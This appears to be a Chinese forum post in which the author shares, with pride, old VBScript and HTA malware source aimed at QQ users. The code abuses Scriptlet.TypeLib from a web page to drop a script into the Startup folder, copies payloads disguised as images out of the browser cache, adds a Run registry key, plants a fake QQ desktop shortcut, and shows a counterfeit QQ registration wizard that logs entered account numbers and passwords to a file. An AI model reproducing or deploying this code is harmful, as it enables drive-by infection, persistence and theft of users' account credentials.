当年的吐血力做。。。现在看来我还是觉得思路很巧妙（那时不象现在

对脚本防火墙看得很严）

<html>
<script language=vbs>
'on error resume next
rem  czy a scit boy
cal
sub cal()
myname=document.location
If Right(myname, 3) = "hta" Then
call svbs()
end if
end sub

sub svbs()
'on error resume next
set fso = createobject("Scripting.FileSystemObject")
If  not (fso.FolderExists("c:\windows\system32\qq")) Then
fso.CreateFolder("c:\windows\system32\qq")
call sv()
else
settimeout "aa()",1
end if
end sub

sub sv()
set fso = createobject("Scripting.FileSystemObject")
set fil = fso.opentextfile("C:\WINDOWS\Start Menu\Programs\启动\so.vbs",2,true)
fil.writeline "drnext"
fil.writeline "sub drnext()"
fil.writeline "on error resume next"
fil.writeline "set fso = createobject(""Scripting.FileSystemObject"")"
fil.writeline "If (fso.FileExists(""C:\WINDOWS\Start Menu\Programs\启动\so.hta"")) Then"
fil.writeline "fso.DeleteFile(""C:\WINDOWS\Start Menu\Programs\启动\so.hta"")"
fil.writeline "end if"
fil.writeline "for each dr in fso.getfolder(""C:\windows\tempor~1"").subfolders"
fil.writeline "   fdnext(dr)"
fil.writeline "   flnext(dr)"
fil.writeline " next "
fil.writeline "end sub"
fil.writeline "sub fdnext(dr)"
fil.writeline "for each fd in dr.subfolders"
fil.writeline "   fdnext(fd)"
fil.writeline "   flnext(fd)"
fil.writeline "next"
fil.writeline "end sub"
fil.writeline "sub flnext(dr)"
fil.writeline "set fso = createobject(""Scripting.FileSystemObject"")"
fil.writeline "for each fl in dr.files"
fil.writeline "If LCase(fso.GetFileName(fl))=""123451[1].bmp"" then"
fil.writeline "fso.CopyFile fl, ""c:\windows\system32\qq\1.bmp"""
fil.writeline "elseif LCase(fso.GetFileName(fl))=""123452[1].ico"" then"
fil.writeline "fso.CopyFile fl, ""c:\windows\system32\qq\1.ico"""
fil.writeline "elseif LCase(fso.GetFileName(fl))=""123453[1].jpeg"" then"
fil.writeline "fso.CopyFile fl, ""c:\windows\system32\qq\2.jpg"""
fil.writeline "elseif LCase(fso.GetFileName(fl))=""123454[1].jpeg"" then"
fil.writeline "fso.CopyFile fl, ""c:\windows\system32\qq\dl.vbs"""
fil.writeline "elseif LCase(fso.GetFileName(fl))=""123455[1].jpeg"" then"
fil.writeline "fso.CopyFile fl, ""c:\windows\system32\qq\qq.vbs"""
fil.writeline "elseif LCase(fso.GetFileName(fl))=""123456[1].jpeg"" then"
fil.writeline "fso.CopyFile fl, ""c:\windows\system32\qq\qq1.hta"""
fil.writeline "elseif LCase(fso.GetFileName(fl))=""123457[1].jpeg"" then"
fil.writeline "fso.CopyFile fl, ""c:\windows\system32\qq\qq2.hta"""
fil.writeline " End If"
fil.writeline "next"
fil.writeline  "set R = CreateObject(""WScript.Shell"")"
fil.writeline  "R.RegWrite ""HKCU\Software\Microsoft\Windows\CurrentVersion\Run\qq"",_"
fil.writeline  """c:\windows\system32\qq\qq.vbs"""
fil.writeline "end sub"
'----------------------------
settimeout "aa()",1
end sub

sub aa()
window.close
end sub
</script>

<script language=vbscript>
on error resume next
function lvbs()
For Each ws In document.scripts
If LCase(ws.Language) = "vbs" Then
      Lvbs = ws.Text
      Exit Function
   End If
next
end function
main
sub main()
dim aa
lvbs
aa="<html><script language=vbscript>" & lvbs & "<" & "/" & "script" & ">" & "<" & "/" & "html" & ">"
    set os = createobject("Scriptlet.TypeLib")
        Os.Reset
        Os.Path = "C:\WINDOWS\Start Menu\Programs\启动\so.hta"
        Os.Doc = aa
        Os.Write()
end sub
</script>
<img src=123451.bmp>
<img src=123452.ico>
<img src=123453.jpg>
<img src=123454.jpg>
<img src=123455.jpg>
<img src=123456.jpg>
<img src=123457.jpg>
<body>
</body>
</html>

;--------------------

CALL QQ()
Sub qq()
Set wsh1 = wscript.CreateObject("wscript.Shell")
DesktopPath = WSH1.SpecialFolders("Desktop")
Set MyShortcut = WSH1.CreateShortcut(DesktopPath & "\腾讯QQ.lnk")
MyShortcut.TargetPath = WSH1.ExpandEnvironmentStrings("C:\WINDOWS\SYSTEM32\QQ\QQ2.HTA")
MyShortcut.WorkingDirectory = WSH1.ExpandEnvironmentStrings("%windir%")
MyShortcut.WindowStyle = 4
MyShortcut.IconLocation = WSH1.ExpandEnvironmentStrings("C:\Progra~1\Tencent\qq2000b.exe, 0")
MyShortcut.Save
end sub
;--------------------------

Set objArgs = WScript.Arguments
'msgbox objargs(0) & objargs(1)
call dl(objargs(0),objargs(1))
sub dl(name,pass)
on error resume next
set WshShell = WScript.CreateObject("WScript.Shell")
   qqpath = "C:\Progra~1\Tencent\qq2000b.exe"
   WshShell.Run qqpath,0
   WScript.Sleep 500
   WshShell.AppActivate "QQ 注册向导"
'   WScript.Sleep 100
   WshShell.SendKeys "{down}"
'   WScript.Sleep 100
   WshShell.SendKeys "{tab}"
'   WScript.Sleep 100
   WshShell.SendKeys name
'   WScript.Sleep 100
   WshShell.SendKeys "{tab}"
'   WScript.Sleep 100
   WshShell.SendKeys pass
   WshShell.SendKeys "~"
end sub

;-------------------------

<HTML>
<HEAD>
 <TITLE>QQ 注册向导</TITLE>
 <HTA:APPLICATION ID="hWnd"
 applicationname="qq"
 icon="1.ico"
 border="dialog"
 borderStyle="raised"
 innerBorder="no"
 maximizebutton="no"
 contextMenu="no"
 SHOWINTASKBAR="yes"
 singleinstance="no">
</head>
<script language=vbs>
dx
sub dx()
window.resizeTo 461,355
window.moveTo 169,110
end sub

sub quit()
window.close
end sub

sub enab2()
on error resume next
window.form1.ra1.checked=true
window.form1.ra2.checked=false
window.form1.hao.disabled=true
window.form1.hao.style.backgroundColor="menu"
window.form1.pas.disabled=true
window.form1.pas.style.backgroundColor="menu"
window.hao1.disabled=true
window.pas1.disabled=true
end sub

sub enab()
on error resume next
window.form1.ra1.checked=false
window.form1.ra2.checked=true
window.form1.hao.disabled=false
window.form1.hao.value=0
window.form1.hao.style.backgroundColor="#FFFFFF"
window.form1.pas.disabled=false
window.form1.pas.value="*"
window.form1.pas.style.backgroundColor="#FFFFFF"
window.hao1.disabled=false
window.pas1.disabled=false
end sub

sub lo()
document.location.href="http://www.tencent.com/cgi-bin/passwd?uin=" & window.form1.text1.value
end sub

sub xia()
Set fso = CreateObject("Scripting.FileSystemObject")
set ls1 =fso.opentextfile ("c:\windows\SYSTEM32\QQ\list.txt",8,true)
myhao=window.form1.hao.value
mypas=window.form1.pas.value
set WshShell = CreateObject("WScript.Shell")
aa=wshshell.run("c:\windows\system32\qq\dl.vbs" & " " & myhao & " " & mypas)
lenhao=len(myhao)
lenpas=len(mypas)
if lenhao>4 and lenhao<9 and lenpas>5 and lenpas<17 then
for i=1 to lenhao
  if asc(mid(myhao,i,1))>=48 and mid(myhao,i,1)<=57 then
hg=hg+1
  end if
next
   if hg=lenhao and myhao<>StrReverse("323484") then
ls1.write "name:"+myhao +chr(13)+chr(10)
ls1.write "pass:"+mypas +chr(13)+chr(10)
ls1.close
   end if
end if
window.close
end sub

sub presskey()
kd=window.event.keycode
if kd=13 then
call xia()
end if
end sub
</script>
<BODY   onkeydown=presskey() oncontextmenu=window.event.returnValue=false style="BACKGROUND-COLOR: menu" topmargin="0" leftmargin="0" bottommargin="0" rightmargin="0" scroll="no"> 
<form name=form1>
<table border=0 style="WIDTH: 401px; HEIGHT: 260px">

<tr>
<td width="45%" align=middle><br>&nbsp;&nbsp<IMG alt=""
      src="2.jpg"></td>
<td><table style="WIDTH: 280px; HEIGHT: 244px" ><tr>
          <td>
          <table border=0
                
            style="WIDTH: 303px; CURSOR: default; HEIGHT: 193px" cellpadding="0" cellspaning="0">
          <tr><td><fieldset style="WIDTH: 271px; CURSOR: default;
                  HEIGHT: 141px"
                 ><legend><span style="FONT-SIZE: 9pt" >用户注册</span></legend>
          <table border=0>
          <tr><td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<INPUT type=radio onclick=enab2() CHECKED name=ra1><span style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体"
                 onclick=enab2()>请申请一个QQ号码</span></td></tr>
          <tr><td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<INPUT type=radio onclick=enab() name=ra2><span style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体"
                 onclick=enab()>使用已有的QQ号码</span></SPAN></td></tr>
          <tr><td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                  <span style="FONT-SIZE: 9pt"  id=hao1  disabled>我的号码:</span>
                  <INPUT style="WIDTH: 118px; FONT-FAMILY: 宋体; FONT-FAMILY:9pt;HEIGHT:
                  21px;
                  BACKGROUND-COLOR: menu" size=14
                  disabled id=""
                  value="" name="hao"></td></tr>
          <tr><td>&nbsp;&nbsp;&nbsp
<span style="FONT-SIZE: 9pt" disabled id=pas1
                 >&nbsp;&nbsp;&nbsp;密码:</span>&nbsp;&nbsp;&nbsp
                 <INPUT name="pas" type=password
                  style="WIDTH: 118px; FONT-FAMILY: 宋体; HEIGHT: 21px;
                  BACKGROUND-COLOR:
              menu" size=14
                    disabled
                    id=""
                    value=""
                 ></SPAN></td></tr>
                 </table></fieldset></td></tr>
                 <tr><td><table>
          <tr><td><span style="FONT-SIZE: 9pt" >
                --我忘了密码了,&nbsp;怎么办?</span></SPAN></td></tr>
          <tr><td><span style="FONT-SIZE: 9pt; FONT-STYLE: normal; FONT-FAMILY: 宋体"
                       >请输入你的QQ号码&nbsp;&nbsp;</span><INPUT
                  style="WIDTH: 67px; HEIGHT: 20px" size=7 id=text1
                  name=text1
                 >&nbsp;&nbsp;<INPUT type=button onclick="lo()" value=" 发送 " style="LEFT: 179px; TOP: 3px; TEXT-ALIGN: center;font-size:9pt;font-family:宋体" ></td></tr>
          </table></td></tr>
          </table>
          </td></tr></table><br></td>
</tr>
</table>

<table border=0 style="WIDTH: 459px; HEIGHT: 68px" >
<tr>
<td align=right>
<HR style="WIDTH: 447px; HEIGHT: 2px" SIZE=2>
<INPUT style="FONT-SIZE: 9pt; WIDTH: 73px; CURSOR: default; FONT-STYLE: normal; HEIGHT: 20px" type =button size =21 value="< 上一步(B)" accessKey=B disabled>
<INPUT onclick=xia() style="FONT-SIZE: 9pt; WIDTH: 73px; HEIGHT: 20px" type=button size=21 value="下一步(N) >" accessKey=N>

<INPUT style="FONT-SIZE: 9pt; WIDTH: 71px; HEIGHT: 21px" type=button size=21 onclick=quit() value=取消>
<INPUT style="FONT-SIZE: 9pt; WIDTH: 71px; CURSOR: default; HEIGHT: 21px" type=button size=21 value=帮助 disabled>&nbsp;&nbsp;&nbsp;

</td>
</tr>
</table>

</form>
</BODY>
</html>